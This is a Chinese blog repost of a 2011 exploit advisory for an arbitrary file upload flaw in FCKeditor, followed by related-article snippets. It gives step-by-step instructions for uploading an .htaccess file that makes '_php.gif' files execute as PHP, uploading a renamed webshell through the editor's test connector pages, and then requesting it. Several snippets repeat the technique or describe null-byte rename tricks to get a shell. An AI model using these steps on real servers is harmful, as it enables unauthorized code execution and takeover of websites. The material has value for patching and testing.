FCKeditor所有版本任意文件上传缺陷

最新推荐文章于 2023-03-31 10:31:27 发布
最新推荐文章于 2023-03-31 10:31:27 发布
阅读量176 收藏
点赞数
文章标签: php shell
原文链接:http://www.cnblogs.com/mujj/articles/2165996.html
版权

In The Name Of GOD
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] script:http://sourceforge.net/projects/fckeditor/
[+] Author  : pentesters.ir
[+] Website : WwW.PenTesters.IR

利用步骤:

1.创建一个htaccess文件:
代码内容:
<FilesMatch “_php.gif”>
SetHandler application/x-httpd-php
</FilesMatch>

2.使用编辑器上传htaccess文件.

http://www.xxx.com/FCKeditor/editor/filemanager/upload/test.html

http://www.xxx.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html

3.上传shell.php.gif

4.上传后shell.php.gif, 会自动被改名为 shell_php.gif

5.访问http://www.xxx.com/上传目录/shell_php.gif

转载于:https://www.cnblogs.com/mujj/articles/2165996.html

weixin_30416871
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
fckeditor文件上传getshell
千寻的博客
05-17 3259
第二次上传之后是111(1).asp(此时发现已经存在,进行重命名,进行截断)4、更改后缀.asp txt文件,使用hex更改20–00。window server 2019 的IIS搭建的网站。第一次上传之后是111.asp_txt(此时.变成了_)2、发现可以上传一个txt后缀的文件。3、但是无法上传asp的文件。发现存在FCKeditor。1、访问编辑器,进行上传。
FCKeditor文件上传漏洞及利用-File-Upload-Vulnerability-in-FCKEditor1
08-03
Exploiting PHP Upload Module ofBypassing File-type CheckExploiting PHP Upload Mo
【信安学习笔记三】文件上传
weixin_43374106的博客
08-09 1068
个人学习参考用笔记 目录前言一、(一)域名 前言 xxxxxx 一、 (一)域名 标题
编辑器文件上传简介及演示-CMS文件上传简介及演示-文件上传漏洞分析详细流程
ran的博客
02-02 763
在某些网站里,可能会套用第三方的编辑器,来对图片、音频、文章等做相关处理,因此如果网站内有编辑器的话,编辑器的类型、版本也是我们进行渗透的一个点,大部分的编辑器漏洞都是文件上传漏洞。在网上有很多网站开源原码(简称CMS),CMS原码也可能会有相应的文件上传漏洞,只需要在网上查找相应漏洞,便可以进行突破。
FCKeditor 2.6.4 php版本任意文件上传——漏洞复现
W小哥
06-17 7081
一、漏洞描述 FCKeditor是目前最优秀的可见即可得网页编辑器之一,它采用JavaScript编写。具备功能强大、配置容易、跨浏览器、支持多种编程语言、开源等特点。它非常流行,互联网上很容易找到相关技术文档,国内许多Web项目和大型网站均采用了FCKeditor。 Fckeditor 低于 2.6.4 php 版本任意文件上传漏洞,当您的PHP环境配置为 GPC = Off 时可绕过currentfolder参数过滤上传脚本木马控制网站服务器 二、漏洞原理 漏洞版本:<=2.6.4 三、环境搭建
fckeditor asp版本的文件重命名
10-29
最近不得不研究FCKEDITOR,而且是ASP版本。对其文件上传后的重命名,很郁闷。下面记录我修改的过程,部分函数来自网络。
fckeditor 防止上传非法文件 增加登录判断
10-28
fckeditor 防止上传非法文件 增加登录判断,需要的朋友可以参考下
修改fckeditor的文件上传功能步骤
10-30
虽然fckeditor自带了文件上传功能,但感觉自带的不方便使用。
fckeditor php上传文件重命名的设置
10-30
我使用的fckeditor版本fckeditor2.6.4.fckeditor默认上传文件不没有重命名的,这样的话就很麻烦,有时上传中文的文件或者名称重复的文件就很恼火。
fckeditor上传文件按日期存放及重命名方法
10-24
主要介绍了fckeditor上传文件按日期存放及重命名方法,本文修改了相关PHP文件实现这二个需求,需要的朋友可以参考下
FCKEDITOR 常用上传方法
10-30
FCKEDITOR 常用上传方法及上传位置
复现awvs——FCKeditor 任意文件上传漏洞思维引导到getshell
记录并分享学习安全的知识点..
03-20 6538
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保。 一、复习文件解析漏洞 解析漏洞,是指中间件(Apache、nginx、iis等)在解析文件时出现了漏洞,从而,黑客可以利用该漏洞实现非法文件的解析。 (一)Apache解析漏洞 Apache解析文件规则是从右到左。例如shel.php.gix.ccc,apache会先识别ccc,ccc不被识别,则识别gix,以此类推,最后会被识别为php来运行。 文件解析漏洞总结-Apache_1stPeak的博客-CSDN...
fckeditor 2 6 4 任意文件上传漏洞
ytfhjhv的博客
11-12 6373
fckeditor 2 6 4 任意文件上传漏洞
fckeditor任意文件上传漏洞
u012684933的专栏
02-26 6240
1. 创建.htaccess文件,内容如下: <FilesMatch "_php.gif"> SetHandler application/x-httpd-php .htaccess文件可以用来设置某个目录和某个目录的子目录的权限,以上内容的意思是将扩展名是"_php.gif"的文件解析成php 2.使用如下url,上
FCKeditor文件上传配置
Java_han的专栏
08-30 2693
FCKeditor编辑功能的使用 下载并解压FCKeditor放于WebRoot目录下 在使用页面引入fckeditor目录下的fckeditor.js <script type="text/javascript" src="./fckeditor/fckeditor.js"></script> 使用如下代码调用显示 <script type="te
FCKeditor上传设置
MascotDai的专栏
10-30 1089
看大家要FCKeditor上传设置的部分,所以仔细找了下,以前看到别人说FCKeditor有上传漏洞,所以一直没有用过此功能!希望能够解决大家的问题!因版本更新问题,可能具体行数不一致,请大家仔细修改!谢谢大家的关注!FCKeditor目前已经更新到2.4.2版,详情请看官方http://www.fckeditor.net/上传文件设置简洁fckconfig.js 134 135 行[
FCKeditor 2.5 使用方法 配置ASP上传功能
judge9999的专栏
02-25 993
FCKeditor 刚刚发布了FCKeditor 最新版本 2.5 ,拿到手以后就开始研究了一下,发现很多功能还不能使用,需要设置一下。                现在和大家一起分享一下!下载解压后,内部文件如图所示: 里面有FCKEditor编辑器程序包,在FCKEditor最新版本FCKEditor 2.5版中提供了官方范例,在上图所示的_Samples,大家可以看看
fckeditor如何能实现直接粘贴把图片上传到服务器中
Mr_Zang666的博客
03-31 178
"Servers" :[{"url":"www.ncmem.com"},{"url":"www.xproerui.com"}]//内部服务器地址(不下载此地址中的图片)JPG/PNG/GIF/BMP,推荐使用JPG格式,防止出现大图片。, "PasteImageType" : "" //粘贴文件,剪帖板的图片格式,为空表示本地图片格式。, "PasteImgSrc" : "" //shape:优先使用源公式图片,img:使用word自动生成的图片。
fckeditor漏洞_三十,文件上传漏洞、编辑器漏洞和IIS高版本漏洞及防御
qq_50854662的博客
11-08 4344
fckeditor漏洞_三十,文件上传漏洞、编辑器漏洞和IIS高版本漏洞及防御
fckeditor文件上传
最新发布
10-10
对于fckeditor文件上传,你可以按照以下步骤进行操作: 1. 配置服务器:确保服务器环境支持文件上传功能,包括启用合适的文件上传功能和设置合适的目录权限。 2. 配置fckeditor:在fckeditor的配置文件中,找到`...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值